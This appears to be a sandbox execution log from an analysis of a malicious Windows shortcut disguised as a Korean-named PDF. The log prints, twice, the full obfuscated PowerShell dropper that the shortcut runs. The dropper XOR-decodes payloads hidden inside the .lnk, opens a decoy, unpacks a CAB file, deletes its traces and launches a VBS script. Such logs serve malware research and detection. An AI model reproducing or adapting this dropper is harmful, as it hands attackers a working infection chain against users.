cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "yXRuhXoiFu" C:\Users\test22\AppData\Local\Temp\제안서.pdf.lnk
2560cmd.exe "C:\Windows\system32\cmd.exe" /c for /f "tokens=*" %f in ('dir /s /b C:\Windows\System32\WindowsPowershell\*.exe ^| findstr /i rshell.exe') do (if exist "%f" (%f "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner*0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear*0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) | <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;" ) )
2648cmd.exe C:\Windows\system32\cmd.exe /c dir /s /b C:\Windows\System32\WindowsPowershell\*.exe | findstr /i rshell.exe
2732cmd.exe C:\Windows\system32\cmd.exe /S /D /c" dir /s /b C:\Windows\System32\WindowsPowershell\*.exe "
2808findstr.exe findstr /i rshell.exe
2844powershell.exe C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe "function sister{param($title); <#obviously effectively#>$mystery = $title.substring(0,$title.length-4) + ''; <#payment go#>return $mystery;};function trend{param($suppose);<#fully odds#> [System.IO.File]::Delete($suppose);};function stir{param($league,$mirror,$winner,$policy,$basket);<#sorry license#> $knee=New-Object System.IO.FileStream(<#organization psychological#>$league,<#field region#>[System.IO.FileMode]::Open,<#lots heavy#>[System.IO.FileAccess]::Read);<#grave rely#> $knee.Seek(<#pitch monitor#>$mirror,[System.IO.SeekOrigin]::Begin);<#glass struggle#> $observe=$winner*0x01;<#case full#> $model=New-Object byte[] <#those find#>$winner; <#highlight receive#> $smooth=New-Object byte[] <#also player#>$observe; <#expert rough#>$knee.Read(<#feeling anywhere#>$smooth,0,<#abandon darkness#>$observe); $knee.Close();$fear=0;while($fear -lt $winner){<#motor external#>$model[$fear]=$smooth[$fear*0x01] -bxor $policy;$fear++;}<#tribe n't#> set-content $basket <#art secure#> $model -Encoding <#platform space#> Byte;};function room{param($acquire, $mainly);<#strengthen fortune#> expand $acquire <#body animal#> -F:* $mainly;};function would{$beauty = $env:public<#component slide#> + '\' +<#audience attempt#> 'do'+'cum'+'en'+'ts';<#approve admit#> return $beauty;};function similar{param($regulation); <#presence ground#>$shot = Split-Path $regulation;<#extreme jury#> return $shot;};function researcher{return Get-Location;};function reality{<#variation choice#>return $env:Temp;};function suicide{$forth = researcher; $deeply = vision -entrance $forth; <#tell result#>if($deeply.length -eq 0) {$forth = reality; <#speaker branch#>$deeply = vision -entrance $forth;} return $deeply;};function chase{$house = $env:public<#swear designer#> + '\' + 'nearby.cab';<#imply guard#> return $house;};function concentration{$accept = $env:public<#contrast insurance#>+'\documents\start.vbs';<#loss lawn#> return $accept;};function vision{param($entrance); <#talent certain#> $massive=''; [System.IO.Directory]::GetFiles($entrance, '*.lnk', [System.IO.SearchOption]::AllDirectories) | <#product wide#>ForEach-Object { <#frame Palestinian#> $era = [System.IO.FileInfo]::new($_); <#rapid asleep#> if ($era.Length -eq 0x00412D29) { <#specifically relation#> $massive = $era.FullName;}}; return <#pale five#> $massive;};$tone = suicide;<#aide clock#>$pipe = similar -regulation $tone;<#headquarters efficiency#> $PM = sister -title $tone;stir -league <#whose meter#> $tone -mirror <#sake opposite#> 0x00001F88 -winner 0x003D7292 -policy <#injury express#> 0x71 -basket <#travel well#> $PM;<#emerge potentially#> & $PM;$advise=chase;<#hearing scholarship#>stir -league <#cost top#> $tone -mirror <#town measurement#> 0x003D921A -winner <#count series#> 0x00013CCF -policy <#theory occasionally#> 0x70 -basket <#year blow#> $advise;<#recommendation clean#>trend -suppose $tone;$east = would;<#spend match#>room -acquire $advise -mainly <#straight send#>$east;<#bother kid#>trend -suppose $advise;$permit = <#detailed crazy#>concentration;<#toy variation#>& $permit;"
2908expand.exe "C:\Windows\system32\expand.exe" C:\Users\Public\nearby.cab -F:* C:\Users\Public\documents
2104